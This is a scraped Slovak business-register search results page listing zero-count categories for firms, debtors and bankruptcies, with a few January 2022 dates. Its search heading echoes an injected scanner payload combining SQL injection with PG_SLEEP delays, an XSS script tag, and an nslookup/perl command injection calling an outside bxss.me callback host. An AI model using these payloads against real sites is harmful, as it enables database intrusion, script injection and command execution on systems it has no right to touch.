Výsledky vyhľadávania: <a HrEF=99aaCDcI' OR 792=bxss.me 792 FROM PG_SLEEP(15))-- OR 2 555-555-1=0 0 0 1 or 'N0wfleQw'='-1' OR 2 865-865-1=-1 OR 3 798-798-1=0 0 0 1 -- -- ' OR 411=bxss.me 411 FROM PG_SLEEP(15))--'0:0:15' -- OR 2 593-593-1=KY4CmnWb') OR 838=(SELECT 838 FROM PG_SLEEP(15))-- -- ></a>7nNWW<ScRiPt >|(nslookup hitvenidarlrt2c5ac.bxss.me||perl -e

Výsledky vyhľadávania môžu obsahovať firmy a osoby s podobným alebo totožným názvom, ako je vyhľadávaný výraz.Pre presnú identifikáciu si vždy pozrite podrobnosti nájdených záznamov (napr. adresu) v jednotlivých zoznamoch.
Subjekty Nájdených záznamov
Sociálna sieť firiem 0
Živnostníci 0
Dlžníci Nájdených záznamov
Burza pohľadávok 0
Záložné práva 0
Poistné 0
Dane 0
Miestne dane 0
Konsolidačné pohľadávky 0
Vyhlásené konkurzy 0
Reštrukturalizácie 0
 

Vyhlásené konkurzy

vyhlásené 19.01.2022
vyhlásené 19.01.2022
vyhlásené 19.01.2022
vyhlásené 18.01.2022
vyhlásené 18.01.2022

Burza pohľadávok

pridané do BP 18.01.2022
pridané do BP 18.01.2022
pridané do BP 17.01.2022